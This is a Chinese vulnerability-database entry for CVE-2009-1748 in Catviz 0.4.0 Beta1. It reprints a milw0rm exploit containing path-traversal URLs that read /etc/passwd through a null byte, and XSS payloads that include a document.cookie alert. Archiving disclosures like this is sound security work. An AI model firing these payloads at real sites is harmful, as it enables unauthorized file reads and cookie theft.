Catviz多个本地文件包含漏洞和跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117808 漏洞类型 路径遍历
发布时间 2009-05-20 更新时间 2009-06-09
CVE编号 CVE-2009-1748 CNNVD-ID CNNVD-200905-272
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/8745
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200905-272
|漏洞详情
Catviz0.4.0Beta1版本的index.php中存在多个目录遍历漏洞。远程攻击者可以借助(1)webpages_form或(2)userman_form参数上的一个..,读取任意文件。
|漏洞EXP
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@===C4TEAM.ORG====ByALBAYX====C4TEAM.ORG====@
@~~=======================================~~@
@~~=Author   : ByALBAYX                     @
@                                           @
@~~=Website  : WWW.C4TEAM.ORG               @
@                                           @
@@@@@@@@@@@@@@@@@@TURKISH@@@@@@@@@@@@@@@@@@@@
@
@              _.--"""""--._
@            .'             '.
@           /                 \
@          ;       C4TEAM      ;
@          |                   |
@          |                   |
@          ;                   ;
@           \ (`'--,    ,--'`) /
@            \ \  _ )  ( _  / /
@             ) )(')/  \(')( (
@            (_ `""` /\ `""` _)
@             \`"-, /  \ ,-"`/
@              `\ / `""` \ /`
@               |/\/\/\/\/\|
@               |\        /|
@               ; |/\/\/\| ;
@                \`-`--`-`/
@                 \      /
@                  ',__,'
@ 
@ Catviz 0.4.0 Beta 1
@ 
@ Demo:
@
@ http://catviz.sourceforge.net
@
@
@ LFI :/
@
@ http://c4team.org/ [Path] /index.php?webpages_form=../../../../../../../../../../../../../etc/passwd%00
@
@ http://c4team.org/ [Path] /index.php?userman_form=../../../../../../../../../../../../../etc/passwd%00
@
@
@
@ XSS :/
@
@
@ http://c4team.org/ [Path] /index.php?userman_form=<script>alert(String.fromCharCode( 66, 89, 65, 76, 66, 65, 89, 88))</script>
@
@ http://c4team.org/ [Path] /index.php?webpages_form=<script>alert(String.fromCharCode( 66, 89, 65, 76, 66, 65, 89, 88))</script>
@
@ http://c4team.org/ [Path] /index.php?userman_form="><script>alert(document.cookie)</script>
@
@ http://c4team.org/ [Path] /index.php?webpages_form="><script>alert(document.cookie)</script>
@
@ http://c4team.org/ [Path] /index.php?userman_form='><h1>ByALBAYX</h1><div style=display:none>
@
@ http://c4team.org/ [Path] /index.php?webpages_form='><h1>ByALBAYX</h1><div style=display:none>
@
@@@:/

# milw0rm.com [2009-05-20]
|参考资料

来源:BID
名称:35042
链接:http://www.securityfocus.com/bid/35042
来源:MILW0RM
名称:8745
链接:http://www.milw0rm.com/exploits/8745
来源:OSVDB
名称:54657
链接:http://osvdb.org/54657